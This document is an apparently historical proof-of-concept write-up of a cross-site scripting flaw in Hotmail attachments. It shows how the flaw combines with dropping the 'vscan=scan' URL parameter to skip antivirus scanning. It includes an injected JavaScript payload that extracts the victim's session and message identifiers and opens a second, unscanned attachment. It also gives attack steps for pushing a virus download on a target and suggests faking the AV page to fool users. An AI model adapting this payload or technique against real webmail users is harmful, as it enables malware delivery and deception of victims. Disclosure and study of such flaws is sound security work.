To show a practical exploit of the XSS on Hotmail webmail server, let's do something
dirty..., let's force the target user to do something that he would never had allowed:
downloading a virus (from Hotmail, of course):-)
I was thinking on some kind of mailbox access, but I needed ActiveX help, and some people
could think: "I do not allow ActiveX on my browser..." or "I run Mozilla...", etc.
So the challenge has been to show how only with javascript, an XSS theoretically non
exploitable (no access to cookies), and some misconfiguration on Hotmail webmail can
result in a serious security problem.
1) I know XSS is present (on file attachments) (good)
2) No access to cookies from the code injected (bad)
3) Is not a flaw in input filtering, any script code is allowed
(good)
4) I don't know if there is any kind of IP based session tracking
method (bad)
5) Redirecting the output of forced client requests from the XSS
code is possible (good)
6) The code to succefully exploit redirection (ActiveX, extended
XML,...) is browser dependant (bad)
So at least the only room I have to play is Javascript (exploiting
XSS only with HTML
injection doesn't seem to be effective in this case...).
If we take a look at the URL from where attachments are opened,
we can see the session identifier
and message identifier.With this info we can build a request to...
the same message we have sent?
Yes, yes, yes. The same message (same identifier) can have many
attachments...
We can make a request to the same message but different attachment...
Why this??? Imagine that we could bypass the antivirus software
only with a litle modification
of the HTTP request... We could not do this in the same attachment
we send our XSS code, because
this is directly opened by the browser of the target, but we could
still force a crafted request from
our XSS code to open a different attachment (on the same message)
and without calling the AV software. :-)
How to bypass the AV software...
This a sample URL to get an attachment from Hotmail.
http://by7fd.bay7.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&
a=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&msg=MSGXXXXXXXXXX.XX&start=XXXXXXX&
len=XXXX&mimepart=3&vscan=scan
"vscan=scan" ... ummm... Remove this, and the antivirus
will not be called! Scared? Wait... :-)
Now lets send to the target user a mail with two attachments.
The first one whit this code:
---------------------------------------------------------------------------------------------
<html>
<script>
str1=document.URL
str2=str1.slice(55,110)
splitString = str2.split("&")
str3=splitString[0]+"&"+splitString[1]
window.open('http://by7fd.bay7.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a='+str3+'&mimepart=4')
</script>
</html>
----------------------------------------------------------------------------------------------
Notice that to make this code working on any enviroment, you
will have to use ¨splits¨and not ¨slices¨. This
is a proof of concept exploit. The only important thing is to
extract user and message identifiers, no matter how you achieve
this. If this code doesn´t work for you, try to change slice(X,Y).
The second attachment will be a virus testing file (for example
EICAR).
Once the target opens the first attachment, the AV software will
tell him that all it's OK, but
when he tries to download the file, it will be opened "online",
the XSS code will be executed and:
-session ID and message ID will be retrieved
-a new window will be opened pointing to the second attachment,
but without calling AV software
What can see the user?
He will see that he can download the file, without any AV warning,
he will see that is downloading from
Hotmail.
An experienced user can notice that something strange it's happening...
but still is possible to trick him by
opening a similar page to the one showed when the AV software
is called... As always, now, the only limit is the imagination
of the attacker.
Conclusions:
-XSS is present on Hotmail
-Hotmail Antivirus software can easily be bypassed exploiting
this XSS
-Users of Hotmail are on high risk
A new generation of XSS is coming...
XSS
screenshot
AV bypass: screenshot1
screenshot2 screenshot3
screenshot4